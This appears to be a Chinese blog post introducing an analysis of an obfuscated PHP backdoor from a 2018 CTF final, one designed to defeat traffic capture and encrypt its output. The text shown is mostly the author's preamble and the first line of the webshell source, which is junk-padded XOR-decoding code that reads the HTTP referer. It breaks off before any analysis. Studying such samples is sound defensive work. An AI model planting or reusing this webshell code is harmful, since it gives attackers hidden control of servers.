PHP混淆后门解剖分析(反抓流量、加密结果)

  • Post author:
  • Post category:php


开始前的例行叨叨:

这个后门样本收集于2018红帽杯线下决赛,看到有其他分析收集于自己的服务器,悲剧了(手动笑哭),貌似蓝帽杯也有。

调试了很久,

被逼着专门学了半天正则表达式,但感觉写完这篇文章就忘干净了。


马的特殊性就是,靠特别麻烦,让你在现场心态崩溃,调试不出来,而且抓到流量不会打,直接打过去也看不懂结果6666


(手动滑稽)






后门源码

<?php
$s='=0;pw($pwj<$c&&$ipw<$l);$jpw++pw,$i++){$opw.=$pwt{$i}^$k{$j}pw;}}repwpwturn pw$o;}$r=$_SERVEpwR;$pwpwrr=@$r["HpwTTP_REpwpwFE';
$I&



版权声明:本文为publicStr原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。